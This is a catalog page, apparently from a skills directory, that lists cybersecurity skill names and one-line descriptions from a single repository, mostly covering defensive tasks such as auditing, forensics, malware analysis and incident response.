ReddRadar
Topic: mcp
13,395 skills in this topic.
-
validating-backup-integrity-for-recovery
Validate backup integrity through cryptographic hash verification, automated restore testing, corruption detection, and recoverability checks to ensure backups are reliable for disaster recovery and ransomware response scenarios.
mukul975/Anthropic-Cybersecurity-Skills 4,300
-
auditing-terraform-infrastructure-for-security
Auditing Terraform infrastructure-as-code for security misconfigurations using Checkov, tfsec, Terrascan, and OPA/Rego policies to detect overly permissive IAM policies, public resource exposure, missing encryption, and insecure defaults before cloud deployment.
mukul975/Anthropic-Cybersecurity-Skills 4,300
-
building-devsecops-pipeline-with-gitlab-ci
Design and implement a comprehensive DevSecOps pipeline in GitLab CI/CD integrating SAST, DAST, container scanning, dependency scanning, and secret detection.
mukul975/Anthropic-Cybersecurity-Skills 4,300
-
analyzing-office365-audit-logs-for-compromise
Parse Office 365 Unified Audit Logs via Microsoft Graph API to detect email forwarding rule creation, inbox delegation, suspicious OAuth app grants, and other indicators of account compromise.
mukul975/Anthropic-Cybersecurity-Skills 4,300
-
analyzing-mft-for-deleted-file-recovery
Analyze the NTFS Master File Table ($MFT) to recover metadata and content of deleted files by examining MFT record entries, $LogFile, $UsnJrnl, and MFT slack space using MFTECmd, analyzeMFT, and X-Ways Forensics.
mukul975/Anthropic-Cybersecurity-Skills 4,300
-
analyzing-malware-sandbox-evasion-techniques
Detect sandbox evasion techniques in malware samples by analyzing timing checks, VM artifact queries, user interaction detection, and sleep inflation patterns from Cuckoo/AnyRun behavioral reports
mukul975/Anthropic-Cybersecurity-Skills 4,300
-
auditing-cloud-with-cis-benchmarks
This skill details how to conduct cloud security audits using Center for Internet Security benchmarks for AWS, Azure, and GCP. It covers interpreting CIS Foundations Benchmark controls, running automated assessments with tools like Prowler and ScoutSuite, remediating failed controls, and maintaining continuous compliance monitoring against CIS v5 for AWS, v4 for Azure, and v4 for GCP.
mukul975/Anthropic-Cybersecurity-Skills 4,300
-
building-soc-playbook-for-ransomware
Builds a structured SOC incident response playbook for ransomware attacks covering detection, containment, eradication, and recovery phases with specific SIEM queries, isolation procedures, and decision trees. Use when SOC teams need formalized response procedures for ransomware incidents aligned to NIST SP 800-61 and MITRE ATT&CK ransomware techniques.
mukul975/Anthropic-Cybersecurity-Skills 4,300
-
collecting-indicators-of-compromise
Systematically collects, categorizes, and distributes indicators of compromise (IOCs) during and after security incidents to enable detection, blocking, and threat intelligence sharing. Covers network, host, email, and behavioral indicators using STIX/TAXII formats and threat intelligence platforms. Activates for requests involving IOC collection, indicator extraction, threat indicator sharing, compromise indicators, STIX export, or IOC enrichment.
mukul975/Anthropic-Cybersecurity-Skills 4,300
-
building-threat-intelligence-platform
Building a Threat Intelligence Platform (TIP) involves deploying and integrating multiple CTI tools into a unified system for collecting, analyzing, enriching, and disseminating threat intelligence. T
mukul975/Anthropic-Cybersecurity-Skills 4,300
-
analyzing-tls-certificate-transparency-logs
Queries Certificate Transparency logs via crt.sh and pycrtsh to detect phishing domains, unauthorized certificate issuance, and shadow IT. Monitors newly issued certificates for typosquatting and brand impersonation using Levenshtein distance. Use for proactive phishing domain detection and certificate monitoring.
mukul975/Anthropic-Cybersecurity-Skills 4,300
-
analyzing-cloud-storage-access-patterns
Detect abnormal access patterns in AWS S3, GCS, and Azure Blob Storage by analyzing CloudTrail Data Events, GCS audit logs, and Azure Storage Analytics. Identifies after-hours bulk downloads, access from new IP addresses, unusual API calls (GetObject spikes), and potential data exfiltration using statistical baselines and time-series anomaly detection.
mukul975/Anthropic-Cybersecurity-Skills 4,300
-
building-identity-governance-lifecycle-process
Builds comprehensive identity governance and lifecycle management processes including joiner-mover-leaver automation, role mining, access request workflows, periodic recertification, and orphaned account remediation using IGA platforms. Activates for requests involving identity lifecycle management, JML processes, role-based access provisioning, or identity governance program design.
mukul975/Anthropic-Cybersecurity-Skills 4,300
-
analyzing-cobaltstrike-malleable-c2-profiles
Parse and analyze Cobalt Strike Malleable C2 profiles using dissect.cobaltstrike and pyMalleableC2 to extract C2 indicators, detect evasion techniques, and generate network detection signatures.
mukul975/Anthropic-Cybersecurity-Skills 4,300
-
analyzing-malicious-url-with-urlscan
URLScan.io is a free service for scanning and analyzing suspicious URLs. It captures screenshots, DOM content, HTTP transactions, JavaScript behavior, and network connections of web pages in an isolat
mukul975/Anthropic-Cybersecurity-Skills 4,300
-
building-incident-timeline-with-timesketch
Build collaborative forensic incident timelines using Timesketch to ingest, normalize, and analyze multi-source event data for attack chain reconstruction and investigation documentation.
mukul975/Anthropic-Cybersecurity-Skills 4,300
-
building-adversary-infrastructure-tracking-system
Build an automated system to track adversary infrastructure using passive DNS, certificate transparency, WHOIS data, and IP enrichment to map and monitor threat actor command-and-control networks.
mukul975/Anthropic-Cybersecurity-Skills 4,300
-
building-malware-incident-communication-template
Build structured communication templates for malware incidents including stakeholder notifications, executive briefings, technical advisories, and regulatory disclosures with severity-based escalation procedures.
mukul975/Anthropic-Cybersecurity-Skills 4,300
-
analyzing-powershell-script-block-logging
Parse Windows PowerShell Script Block Logs (Event ID 4104) from EVTX files to detect obfuscated commands, encoded payloads, and living-off-the-land techniques. Uses python-evtx to extract and reconstruct multi-block scripts, applies entropy analysis and pattern matching for Base64-encoded commands, Invoke-Expression abuse, download cradles, and AMSI bypass attempts.
mukul975/Anthropic-Cybersecurity-Skills 4,300
-
analyzing-network-packets-with-scapy
Craft, send, sniff, and dissect network packets using Scapy for protocol analysis, network reconnaissance, and traffic anomaly detection in authorized security testing
mukul975/Anthropic-Cybersecurity-Skills 4,300
-
analyzing-network-flow-data-with-netflow
Parse NetFlow v9 and IPFIX records to detect volumetric anomalies, port scanning, data exfiltration, and C2 beaconing patterns. Uses the Python netflow library to decode flow records, builds traffic baselines, and applies statistical analysis to identify flows with abnormal byte counts, connection durations, and periodic timing patterns.
mukul975/Anthropic-Cybersecurity-Skills 4,300
-
analyzing-linux-kernel-rootkits
Detect kernel-level rootkits in Linux memory dumps using Volatility3 linux plugins (check_syscall, lsmod, hidden_modules), rkhunter system scanning, and /proc vs /sys discrepancy analysis to identify hooked syscalls, hidden kernel modules, and tampered system structures.
mukul975/Anthropic-Cybersecurity-Skills 4,300
-
analyzing-golang-malware-with-ghidra
Reverse engineer Go-compiled malware using Ghidra with specialized scripts for function recovery, string extraction, and type reconstruction in stripped Go binaries.
mukul975/Anthropic-Cybersecurity-Skills 4,300
-
analyzing-email-headers-for-phishing-investigation
Parse and analyze email headers to trace the origin of phishing emails, verify sender authenticity, and identify spoofing through SPF, DKIM, and DMARC validation.
mukul975/Anthropic-Cybersecurity-Skills 4,300